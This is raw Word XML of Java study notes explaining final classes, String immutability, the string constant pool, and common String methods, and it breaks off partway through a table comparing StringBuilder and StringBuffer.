    <w:p w14:paraId="7D6E3BFA"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call its methods, and use it like any regular class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BFD1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937F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4EC0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ehicle is running"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E08915"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7ED13"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714EFB3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0977C6"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44E9A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590B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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D10B9"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Works fine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87600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34A1AB" w14:textId="516471E9"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E8169A3"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2. You cannot extend it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE6B74"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If any other class tries to inherit it, the compiler throws an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493BA55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2688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 Cannot inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FE1D3" w14:textId="0E0F7FDC"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5D6F461"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CE4B95" w14:paraId="39041E88" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EF5ADA"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4A7D03B5"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9C5280" w:rsidRPr="00CE4B95" w14:paraId="52F2945C" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1410D5"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ecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D6BB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classes from being modified via inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="3A0C1406" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F325D4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mmutability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A31F837"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Helps build immutable classes (like String)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="7843FF9F" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C68ECF0"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ramework Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6056AD5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Used in APIs to avoid unexpected subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="15843A99" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B278F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table Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50D8500F"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method overriding and logic changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23FFD63D" w14:textId="77777777" w:rsidR="0064347B" w:rsidRPr="00CE4B95" w:rsidRDefault="0064347B" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F489AF8" w14:textId="77777777" w:rsidR="0064347B" w:rsidRPr="00CE4B95" w:rsidRDefault="0064347B" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED426B9" w14:textId="28CA987C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE38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lastRenderedPageBreak/>
        <w:t>The String class in Java is final:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06225551"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FADB5"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ternal implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37023B44" w14:textId="55A1BD3B"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F9E5E"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Why? Because String is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B4E6B"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Immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C49A5"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Used heavily in JVM internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C212A3"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Needs guaranteed behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151CCF0"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you CANNOT do with a final class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA46E1"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ubclass it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E05B8"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verride its methods in a child class (since no child class can exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E57D5" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="006263F3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">But you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C671D"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nstantiate it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C8A1F"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its methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB7EC9"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ass it around like any other class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA01C79" w14:textId="1688554B"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CE4B95" w:rsidRDefault="001967B5" w:rsidP="001967B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc197867231"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is String?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="43F3A4E2" w14:textId="454AA517" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="006912E8">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String in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509566D"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n Java, String is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02459C1F"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represent </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a sequence of characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (text data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438302F0"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Once a String object is creat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4B4DCF98" w14:textId="09798578" w:rsidR="003F7F87" w:rsidRPr="00CE4B95"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42B003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Here, name is a String object containing the text "Alice".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3F743" w14:textId="77777777" w:rsidR="00B41C76" w:rsidRPr="00CE4B95" w:rsidRDefault="00B41C76" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E29B0A" w14:textId="3E1D86AA"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a Class (Not a Primitive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062A447"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not a primitive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like int, char, boolean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534502DF"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It's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but behaves like a basic data type due to special handling by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2829C" w14:textId="77777777"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Immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BE77C"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09C613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5454063" w14:textId="78938F4A"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not "Hello World")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49043CD0"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A new String is created internally, but s1 still points to the original "Hello".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DD0BB"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For modifications, use StringBuilder or StringBuffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928C108" w14:textId="13E4AD55"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Strings are Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81F538" w14:textId="0DB7A797" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool (String Interning):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE02D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8202183"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207B704" w14:textId="6DE58E64"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points to same object in string pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DF6FE"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created with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String constant pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B794AF5"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Helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F624C7C" w14:textId="2C87B32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ays to Create Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D088F"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1. Using literals (preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E2945"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D2154E"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8837FD"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2. Using constructor (avoids pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A6783" w14:textId="7A9E58B4"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5078272" w14:textId="0169B41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String Methods</w:t>
      </w:r>
      <w:r w:rsidR="00830868"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CE4B95" w14:paraId="077841DF" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C242128"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11190241"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0A485D" w:rsidRPr="00CE4B95" w14:paraId="5FC448B0" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B83BBB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length()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C51BB1"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the length</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="69291C72" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08257D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arAt(index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="215230DC"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character at index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="0CA0D76F" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="693527E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quals()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3749286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value equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="163A175F" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11757E24"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lastRenderedPageBreak/>
              <w:t>==</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6374E31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reference equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="555C7423" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9F5BB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LowerCase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758DA0B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lowercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="7AF0755C" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56E037C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UpperCase()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C7ED8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uppercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="02A8DC4B" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D34D7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ubstring(start)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464FE8F5"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xtracts a part of the string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="3EA0B826" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2317E23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tains(str)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="664D4D7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if substring is present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="78F66AB1" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C56A5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regex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E8C571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s string into array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="51FC834D" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2067F7D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a, b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F9CEB5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s characters or substrings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="0A8B6293" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F460AF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rim()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D20B34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moves leading/trailing spaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="610E67BC" w14:textId="77777777" w:rsidR="00B43C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43C62" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A157A36" w14:textId="48E70096"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utable Alternatives</w:t>
      </w:r>
      <w:r w:rsidR="00AA35CC"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CE4B95" w14:paraId="555EE591" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54FE5B5B"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Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D03A7E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Thread Safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="504DD7D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0A485D" w:rsidRPr="00CE4B95" w14:paraId="49A54B79" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3499D2E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ilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
